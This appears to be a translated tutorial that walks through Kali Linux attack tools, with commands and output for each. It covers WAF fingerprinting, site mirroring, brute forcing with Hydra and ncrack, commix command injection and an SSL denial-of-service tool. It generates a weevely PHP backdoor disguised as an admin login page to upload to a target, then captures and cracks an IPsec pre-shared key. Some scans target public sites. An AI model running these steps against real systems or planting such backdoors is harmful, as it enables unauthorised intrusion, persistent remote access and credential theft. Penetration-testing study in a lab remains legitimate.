Introduction to the Kali tool set
Tool index
0x01. Route scanning tools
hping3
Some hosts do not answer ICMP ping; with hping3 you can still confirm that a target is online.
hping3 sends its "ping" as TCP packets with the SYN flag set,
directed at port 80, a port that is rarely filtered.
0x02. WAF detection
wafw00f
┌──(root💀kali)-[~]
└─# wafw00f www.baidu.com
~ WAFW00F : v2.1.0 ~
The Web Application Firewall Fingerprinting Toolkit
[*] Checking https://www.baidu.com
[+] Generic Detection results:
[*] The site https://www.baidu.com seems to be behind a WAF or some sort of security solution
[~] Reason: The server header is different when an attack is detected.
The server header for a normal response is "BWS/1.1", while the server header a response to an attack is "Apache",
[~] Number of requests:
0x03. Mirroring a website
httrack
This command clones a given website and writes the mirrored site's source files to disk:
httrack http://www.example.com/ -O output   (output = the output directory)
Bytes saved: 1,41MiB Links scanned: 7/64 (+11)
Time: 7s Files written: 16
Transfer rate: 910B/s (11,76KiB/s) Files updated: 14
Active connections: 0 Errors: 0
Current job: waiting (throttle)
ready - 192.168.3.29/plane3/js/ 691B / 691B
* 192.168.3.29/plane3/images/home_42.jpg (562 bytes) - OK
0x04. Brute-force tools
Hydra-GTK
Hydra-GTK is the graphical front end for Hydra and is simple to operate: typically you load a wordlist and run a brute-force attack against the specified site.
Supported services include FTP, FTPS, HTTP, HTTPS, ICQ, IRC, LDAP, MySQL, Oracle, POP3, pcAnywhere, SNMP, SSH and VNC.
0x05. OS command injection
commix
commix is an automated tool written in Python; if the injection succeeds, it can execute arbitrary OS commands on the target.
Run commix -h to list all options.
Example:
commix --url="http://192.168.3.29/plane3/adm/html/plane.html" --data="target_host=127.0.0.1" --headers="Accept-Language:fr\nETAG:123\n"
0x06. PHP web shell
Weevely
weevely is a popular, lightweight PHP web shell that emulates a remote terminal session on the host where it is deployed.
┌──(root💀kali)-[~]
└─# weevely
[+] weevely 4.0.1
[!] Error: the following arguments are required: url, password
[+] Run terminal or command on the target
weevely <URL> <password> [cmd]
[+] Recover an existing session
weevely session <path> [cmd]
[+] Generate new agent
weevely generate <password> <path>
Generate the agent file (the backdoor):
┌──(root💀kali)-[~]
└─# weevely generate 1234 /root/output/192.168.3.29/plane3/php/adm_login.html
Generated '/root/output/192.168.3.29/plane3/php/adm_login.html' with password '1234' of 781 byte size.
Upload the generated agent file to the target site.
Then create a session with the following command:
weevely <URL> <password> [cmd]
0x07. High-speed authentication cracking tool
ncrack
Supports the FTP, HTTP(S), POP3, RDP, SMB, SSH, Telnet and VNC protocols.
ncrack -vv -U user.lst -P password.lst <IP:port>   (user.lst and password.lst are the username and password wordlists)
0x08. SSL vulnerability scanning tool
testssl
Download testssl from https://testssl.sh/testssl.sh
After downloading, use chmod to make the script executable (execute permission is all it needs; the file does not have to be world-writable):
chmod 777 testssl.sh
Scan an HTTPS site:
./testssl.sh https://fanyi.baidu.com/
If you get this error:
./testssl.sh:行272: 警告:setlocale:LC_COLLATE:无法改变区域选项 (en_US.UTF-8):没有那个文件或目录
ATTENTION: No cipher mapping file found!
Please note from 2.9 on testssl.sh needs files in "$TESTSSL_INSTALL_DIR/etc/" to function correctly.
Type "yes" to ignore this warning and proceed at your own risk -->
Fix:
Download version 2.6 instead: go to https://testssl.sh/, choose 2.6 and download it; that version runs without the error (the warning itself names the other option: keep the script together with the etc/ directory it ships with).
┌──(root💀kali)-[~/桌面]
└─# ./testssl.sh https://fanyi.baidu.com/
No mapping file found
No engine or GOST support via engine with your /usr/bin/openssl
###########################################################
testssl.sh 2.7dev from https://testssl.sh/dev/
(1.396a 2016/09/29 23:12:09)
This program is free software. Distribution and
modification under GPLv2 permitted.
USAGE w/o ANY WARRANTY. USE IT AT YOUR OWN RISK!
Please file bugs @ https://testssl.sh/bugs/
###########################################################
Using "OpenSSL 1.1.1k 25 Mar 2021" [~162 ciphers] on
kali:/usr/bin/openssl
(built: "Mar 25 20:49:34 2021", platform: "debian-amd64")
Testing now (2021-07-26 20:31) ---> 110.242.68.186:443 (fanyi.baidu.com) <---
rDNS (110.242.68.186): --
Service detected: HTTP
.....
.....
0x09. SSL testing
thc-ssl-dos
┌──(root💀kali)-[~/桌面]
└─# thc-ssl-dos --accept 192.168.3.29 80
http://www.thc.org
Twitter @hackerschoice
Greetingz: the french underground
Waiting for script kiddies to piss off................
The force is with those who read the source...
Handshakes 0 [0.00 h/s], 1 Conn, 0 Err
SSL: error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol
#12: This does not look like SSL!
The last two lines mean the connection reached port 80, which serves plain HTTP rather than TLS, so no SSL handshake could take place; the tool's result is only meaningful for a port that actually speaks TLS (normally 443).
0x0A. VPN gateway scanning
ike-scan
1. Determine whether the host is a VPN gateway
┌──(root💀kali)-[~/桌面]
└─# ike-scan -M 192.168.3.1
Starting ike-scan 1.9.4 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
Ending ike-scan 1.9.4: 1 hosts scanned in 2.441 seconds (0.41 hosts/sec). 0 returned handshake; 0 returned notify
In the returned data:
0 returned handshake; 0 returned notify means the target is not an IPsec gateway.
0 returned handshake; 1 returned notify means a VPN gateway exists, but it accepts none of the transforms ike-scan offered.
1 returned handshake; 0 returned notify means the target has IPsec configured and will perform an IKE negotiation on one or more of the transforms offered to it.
2. Fingerprint the VPN gateway
ike-scan -M --showbackoff 192.168.3.1
3. Capture the pre-shared key (hash)
Save the result to a text file for further analysis and offline password cracking:
ike-scan -M -A -Ppsk-hash <target>
4. Run the offline PSK crack
psk-crack -d wordlist.txt psk-hash   (wordlist.txt is the dictionary; psk-hash is the file captured in step 3)
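As an added example (not part of these notes and not ike-scan's own code), the decision table from step 1 as a small Python parser over ike-scan's closing summary line; it also reads the SA payload of a host that answered to flag PSK authentication, which is what the aggressive-mode capture in step 3 depends on. The sample outputs are constructed, modelled on the run shown above.

```python
import re

# ike-scan's closing summary line (format as in the run above):
# "Ending ike-scan 1.9.4: 1 hosts scanned ... 0 returned handshake; 0 returned notify"
SUMMARY_RE = re.compile(r"Ending ike-scan [\d.]+: (?P<hosts>\d+) hosts? scanned.*?"
                        r"(?P<handshake>\d+) returned handshake; (?P<notify>\d+) returned notify")
# SA payload printed for a host that completed a handshake: "SA=(Enc=3DES ... Auth=PSK ...)"
SA_RE = re.compile(r"SA=\((?P<sa>[^)]*)\)")

def parse_summary(output):
    """Return (hosts, handshake, notify) from the summary line; raise if it is missing."""
    m = SUMMARY_RE.search(output)
    if m is None:
        raise ValueError("no ike-scan summary line found")
    return int(m["hosts"]), int(m["handshake"]), int(m["notify"])

def classify(handshake, notify):
    """The three interpretation rules from step 1, in one place."""
    if handshake == 0 and notify == 0:
        return "not an IPsec gateway"
    if handshake == 0:
        return "VPN gateway present, but it accepted none of the offered transforms"
    return "IPsec configured; the gateway negotiates on at least one offered transform"

def sa_attributes(output):
    """Parse the first SA=(...) payload into a dict such as {'Auth': 'PSK', ...}."""
    m = SA_RE.search(output)
    return dict(item.split("=", 1) for item in m["sa"].split()) if m else {}

def interpret(output):
    """Classify one run and flag PSK authentication (what the step-3 capture relies on)."""
    _, handshake, notify = parse_summary(output)
    return classify(handshake, notify), sa_attributes(output).get("Auth") == "PSK"

# Constructed sample outputs (not captured from a real scan), one per rule.
START = "Starting ike-scan 1.9.4 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)\n"
END = "Ending ike-scan 1.9.4: 1 hosts scanned in 2.441 seconds (0.41 hosts/sec). "
SAMPLES = {
    "none": START + END + "0 returned handshake; 0 returned notify\n",
    "notify": START + "192.168.3.1\tNotify message 14 (NO-PROPOSAL-CHOSEN) HDR=(CKY-R=0011223344556677)\n"
              + END + "0 returned handshake; 1 returned notify\n",
    "handshake": START + "192.168.3.1\tMain Mode Handshake returned HDR=(CKY-R=0011223344556677) "
                 "SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800)\n"
                 + END + "1 returned handshake; 0 returned notify\n",
}

if __name__ == "__main__":
    for name, out in SAMPLES.items():
        print(name, interpret(out))  # e.g. none ('not an IPsec gateway', False)
```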